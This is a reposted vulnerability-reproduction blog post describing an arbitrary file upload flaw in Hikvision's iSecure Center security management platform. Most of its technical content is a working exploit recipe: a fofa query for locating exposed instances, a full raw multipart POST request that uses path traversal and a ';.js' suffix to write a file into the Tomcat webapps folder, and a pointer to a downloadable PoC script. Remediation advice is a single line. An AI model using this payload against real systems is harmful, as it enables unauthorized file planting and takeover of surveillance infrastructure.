Hikvision isecure center comprehensive security management platform has an arbitrary file upload vulnerability

Enterprise 2023-08-26 00:26:54 views: null

Hikvision isecure center comprehensive security management platform has an arbitrary file upload vulnerability

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Brief introduction of Hikvision isecure center integrated security management platform

WeChat official account search: Nanfeng Vulnerability Reappearance Library This article was first published on the Nanfeng Vulnerability Reappearance Library official account

HIKVISION iSecure Center comprehensive security management platform is a set of "integrated" and "intelligent" platforms, which can obtain edge node data by accessing video surveillance, all-in-one card, parking lot, alarm detection and other system equipment to realize security information integration With the linkage with the electronic map, it integrates the capabilities of each system to realize rich intelligent applications. The HIKVISION iSecure Center platform is designed based on the advanced concept of "unified software technology architecture", and adopts business component technology to meet the elastic expansion of the platform in terms of business. The platform is applicable to the general comprehensive security business of the whole industry. It integrates and centrally manages the resources of each system, and realizes unified deployment, unified configuration, unified management and unified scheduling.

2. Vulnerability description

HIKVISION iSecure Center comprehensive security management platform is a set of "integrated" and "intelligent" platforms, which can obtain edge node data by accessing video surveillance, all-in-one card, parking lot, alarm detection and other system equipment to realize security information integration With the linkage with the electronic map, it integrates the capabilities of each system to realize rich intelligent applications. The HIKVISION iSecure Center platform is designed based on the advanced concept of "unified software technology architecture", and adopts business component technology to meet the elastic expansion of the platform in terms of business. The platform is applicable to the general comprehensive security business of the whole industry. It integrates and centrally manages the resources of each system, and realizes unified deployment, unified configuration, unified management and unified scheduling. Hikvision isecure center comprehensive security management platform has an arbitrary file upload vulnerability

CVE number:

CNNVD number:

CNVD number:

3. Affect the version

HIKVISION iSecure Center integrated security management platform 

4. fofa query statement

app="HIKVISION-iSecure-Center"

5. Vulnerability recurrence

Vulnerability link: https://127.0.0.1/clusterMgr/836424300.txt;.js vulnerability data package:

POST /center/api/files;.js HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 257
Content-Type: multipart/form-data; boundary=ea26cdac4990498b32d7a95ce5a5135c

--ea26cdac4990498b32d7a95ce5a5135c
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/153107606.txt"
Content-Type: application/octet-stream

332299402
--ea26cdac4990498b32d7a95ce5a5135c--

The uploaded file is located at /clusterMgr/153107606.txt;.js Change 153107606 to the file name you uploaded in the data package above. successfully uploaded

6.POC&EXP

Follow the public account Nanfeng Vulnerability Reproduction Library and reply Vulnerability Reproduction 38 to get the POC tool download address: Usage: python3 .\vuln31.py https://127.0.0.1/ Remember to end with /. 

7. Rectification opinions

Please contact the manufacturer to find a solution: https://www.hikvision.com/cn/

8. Past review

Command Execution Vulnerability in Chamilo Learning Management Software (CVE-2023-34960)

Hikvision iVMS Integrated Security System Arbitrary File Upload Vulnerability Reappears

Guess you like

Origin blog.csdn.net/nnn2188185/article/details/131460363
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com